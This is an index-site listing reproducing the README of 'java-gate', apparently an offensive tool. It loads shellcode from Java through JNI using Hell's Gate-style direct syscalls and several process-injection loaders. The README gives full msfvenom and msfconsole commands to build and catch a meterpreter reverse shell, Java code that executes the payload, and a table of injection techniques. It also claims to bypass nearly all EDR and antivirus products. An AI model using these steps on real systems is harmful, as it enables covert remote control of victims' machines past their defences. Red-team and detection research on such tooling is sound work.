Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/4ra1n/java-gate
Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders
https://github.com/4ra1n/java-gate
jni shellcode shellcode-loader
Last synced: about 2 months ago
JSON representation
Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders
- Host: GitHub
- URL: https://github.com/4ra1n/java-gate
- Owner: 4ra1n
- License: apache-2.0
- Created: 2023-06-29T10:16:42.000Z (about 1 year ago)
- Default Branch: master
- Last Pushed: 2023-07-07T09:00:21.000Z (about 1 year ago)
- Last Synced: 2024-07-09T15:25:34.008Z (2 months ago)
- Topics: jni, shellcode, shellcode-loader
- Language: C
- Homepage:
- Size: 2.55 MB
- Stars: 186
- Watchers: 4
- Forks: 20
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# java-gate
![](https://img.shields.io/badge/build-passing-brightgreen)
![](https://img.shields.io/github/downloads/4ra1n/java-gate/total)
![](https://img.shields.io/github/v/release/4ra1n/java-gate)[中文文档](doc/README.zh-CN.md)
The `java-gate` project allows for the implementation of various techniques related to "Hell's Gate" using simple Java code, which involves direct system calls.
```java
byte[] shellcode = new byte[] {(byte)0xfc, (byte)0x48, ...};
HellsGate gate = new HellsGate(shellcode);
gate.exec();
```It supports multiple techniques evolved from "Hell's Gate," such as "Halo's Gate," "Recycled Gate," "Tartarus Gate," and so on. In addition to system call-related functions, it provides many common Shellcode injection techniques, such as APC injection and remote thread injection, and is compiled and built using C and NASM/MASM assembly language. Finally, it calls these techniques at the Java layer through JNI. Various low-level techniques can be achieved through simple Java code.
## Introduction
Why named "java-gate": This project mainly integrates various techniques related to direct system calls, such as Hell's Gate and Halo's Gate. Therefore, it is named "Java Gate," which can also be understood as a gateway between Java and the underlying system.
Note:
- This project only supports 64-bit Windows and 64-bit JVM (as per JNI's requirement that a 64-bit JVM can only load 64-bit DLLs).
- It is recommended to use 64-bit shellcode (e.g., windows/x64/meterpreter/reverse_tcp).
- Loading shellcode in any way may potentially cause JVM crashes (e.g., if the shellcode does not restore the context).
- Only tested in JDK 8, other versions of JDK may not be stable.## Quick Start
(1) Add the `jitpack` repository to your `Maven` configuration:
```xml
jitpack.io
https://jitpack.io
```
(2) Import the project:
```xml
com.github.4ra1n
java-gate
0.0.2```
(3) Obtain the shellcode
Here, we'll use `meterpreter` as an example.
```shell
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=YOUR-PORT -f java
```(4) Start the `msfconsole` listener
Here, we'll use `meterpreter` as an example.
```shell
msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT YOUR-PORT;run;"
```(5) Write a test program
```java
package me.n1ar4;import me.n1ar4.gate.core.HellsGate;
public class Main {
public static void main(String[] args) {
byte buf[] = new byte[]
{
(byte) 0xfc, (byte) 0x48, ...
};
HellsGate gate = new HellsGate(buf);
gate.exec();
}
}
```(6) Go online
The `msfconsole` connection is successfully established.
The system call modules are as follows. Usage is similar to the previous examples, just change the class name.
| Module | Class | Description | Optional |
|:--------------|:--------------------------------|:--------------|:---------|
| hells-gate | me.n1ar4.gate.core.HellsGate | Hells Gate | / |
| halos-gate | me.n1ar4.gate.core.HalosGate | Halos Gate | / |
| recycled-gate | me.n1ar4.gate.core.RecycledGate | Recycled Gate | / |
| ssn-syscall | me.n1ar4.gate.core.SSNSyscall | SSN Syscall | / |
| tartarus-gate | me.n1ar4.gate.core.TartarusGate | Tartarus Gate | / |The loader modules are as follows. Usage is similar to the previous examples, just change the class name.
| Module | Class | Description | Optional |
|:-----------|:-------------------------------------|:---------------------------------------------------------|:-------------|
| apc1 | me.n1ar4.gate.loader.APC1Loader | APC injection using NtTestAlert | / |
| apc2 | me.n1ar4.gate.loader.APC2Loader | Simple thread-based APC injection | / |
| crt | me.n1ar4.gate.loader.CRTLoader | Simple remote thread injection | Process name |
| divide | me.n1ar4.gate.loader.DivideLoader | Create process and inject into it | / |
| early-bird | me.n1ar4.gate.loader.EarlyBirdLoader | Create new process and APC inject | / |
| etwp | me.n1ar4.gate.loader.EtwpLoader | EtwpCreateEtwThread-based injection | / |
| rip | me.n1ar4.gate.loader.RIPLoader | Modify thread context RIP register and execute shellcode | / |Here is an example of how to use the command-line tool.
```shell
java -jar java-gate.jar [module] [shellcode-hex-string] [optional]
```Since the JVM may crash, there is a way to create a new process and execute the code.
```shell
java -jar java-gate.jar run-new-jvm [module] [shellcode-hex-string]
```This is also an approach, and if you want to run this project in your custom code, you can refer to the code `JavaGate#runNewJVM`.
## Build
There are pre-packaged versions available in the "Release" section, but if you are not confident or need to add your own features, you can manually build it by following these steps:
Please note that this project only supports Windows 64-bit and JVM 64-bit environments, so it can only be compiled and built in that environment.
**(1) MSVC x64**
The `CMake Toolchains` use the `MSVC x64` tool, and most of the assembly is based on the `ml64` compiler from `MSVC`.
**(2) CMake 3.x**
The `C` and assembly code is compiled and built using `CMake` to generate the corresponding `DLL` file for `JNI`. It is recommended to use CLion.
**(3) NASM**
Most of the assembly is compiled using `MASM`, but some assembly is compiled using `NASM`, which needs to be downloaded and configured separately in the `PATH`.
**(4) JDK 8 & Maven**
The `Java` part of the code is built using `Java 8` and `Maven`. It is recommended to use IDEA.
**(5) Python 3.x**
This project uses `Python` for some auxiliary tools, which is not actually a necessary option.
## Some tests
Almost Bypass all EDR/AV
## References and Acknowledgements
Many thanks to the following excellent projects for providing code (most of the code in this project is based on these):
- https://github.com/am0nsec/HellsGate
- https://github.com/boku7/AsmHalosGate
- https://github.com/thefLink/RecycledGate
- https://github.com/trickster0/TartarusGate
- https://github.com/janoglezcampos/c_syscalls## Disclaimer
This tool is intended for cybersecurity research and educational purposes only. It should not be used for any illegal activities.